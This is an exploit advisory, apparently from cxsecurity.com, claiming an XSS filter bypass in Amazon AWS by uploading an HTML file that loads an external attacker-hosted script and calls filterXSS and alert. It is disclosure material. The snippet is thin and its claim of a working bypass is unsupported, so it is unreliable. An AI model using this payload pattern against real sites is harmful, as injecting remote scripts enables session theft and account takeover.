Amazon AWS XSS Protection Bypass

2016.07.12
Credit: Ajay Gowtham
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Author: Ajay Gowtham Vendor: ========================== http://aws.amazon.com/ Amazon Web Services, is a subsidiary of Amazon.com, which offers a suite of cloud computing services that make up an on-demand computing platform. These services operate from 12 geographical regions across the world. Vulnerability Type: ====================== XSS PROTECTION BYPASS Vulnerability Details: ===================== The html file is uploaded into the AWS Cloud with the html and injected .js scripts as given below and external js is called from the third party site. Which injects the payload on the cloud and executes into the user interface bypassing the XSS protection filters. As per the need of scope of attack the .js can be modified to handle the requests and payloads Exploit code(s): =============== //external JS script Ref: https://github.com/ajaygowtham/xss/blob/master/try.js //Uploaded .html file in the cloud ----------------------script goes on here------------------------------------------- <script src="https://github.com/ajaygowtham/xss/blob/master/try.js "></script> <script> //Here it goes on :) var html = filterXSS('Ajay Gowtham'); alert(html); </script> ---------------------end----------------------------------------------------------- References: ================================= https://cwe.mitre.org/data/definitions/79.html Exploitation Technique: ======================= Local POC: ======================== https://drive.google.com/folderview?id=0B2p8gG1WpnRnSFRrR1RJWUh0Qjg&usp=sharing [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. AJOXR

References:

https://drive.google.com/folderview?id=0B2p8gG1WpnRnSFRrR1RJWUh0Qjg&usp=sharing


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top